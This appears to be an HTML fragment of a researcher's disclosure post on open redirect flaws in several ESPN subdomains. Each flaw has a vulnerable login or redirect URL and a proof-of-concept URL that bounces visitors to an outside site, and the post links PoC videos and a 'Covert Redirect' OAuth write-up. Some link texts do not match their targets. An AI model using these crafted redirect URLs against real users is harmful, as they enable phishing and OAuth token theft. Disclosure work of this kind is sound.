<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) Login Page </b><b style="background-color: transparent;"> Dest Redirect Privilege Escalation Vulnerability</b></span></div>
<div style="margin: 0px;">
<b style="background-color: transparent;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%<wbr></wbr>2FAndroidOfficial</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://r.espn.go.com/members/<wbr></wbr>login?appRedirect=http%3A%2f%<wbr></wbr>2fdiebiyi.com</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fpages%<wbr></wbr>2Fwwwgooglecom%<wbr></wbr>2Fyahoo101882723190828</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://streak.espn.go.com/en/<wbr></wbr>login?redirect=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2.2) Vulnerabilities Attacked without User Login</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FAdcash%<wbr></wbr>2Flinkedinstatus%2Febay%2Falibaba%<wbr></wbr>2F539770783556698112</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com" target="_blank">http://m.espn.go.com/wireless/<wbr></wbr>mw/util/redirectKeepParams?w=<wbr></wbr>1dpoa&url=http%3A%2F%<wbr></wbr>2Fdiebiyi.com</a>?</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">This vulnerability was used to demonstrate "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" of Facebook,</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=HUE8VbbwUms" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?<wbr></wbr>v=HUE8VbbwUms</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/<wbr></wbr>covert-redirect/covert-<wbr></wbr>redirect-vulnerability-<wbr></wbr>related-to-oauth-2-0-and-<wbr></wbr>openid/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2Freddit%2Fbing%<wbr></wbr>2Ftmallstatus%<wbr></wbr>2Ftmall541002332331606017</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgwespdeportes/5.4/REDIR/<wbr></wbr>065639236847243821390018102438<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=https%3A%2F%<wbr></wbr>2Ftwitter.com%2FYahoo%<wbr></wbr>2Fhao123%2Fstatus%2Fyandex%2F%<wbr></wbr>2Fru%2F541950359917580289</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://w88.m.espn.go.com/b/ss/<wbr></wbr>wdgespw/5.4/REDIR/<wbr></wbr>088360294087348871389981133993<wbr></wbr>?D=..&url=http%3A%2F%2Fgoogle.<wbr></wbr>com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Poc Video:</span></b></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be</a></span></div>
</div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
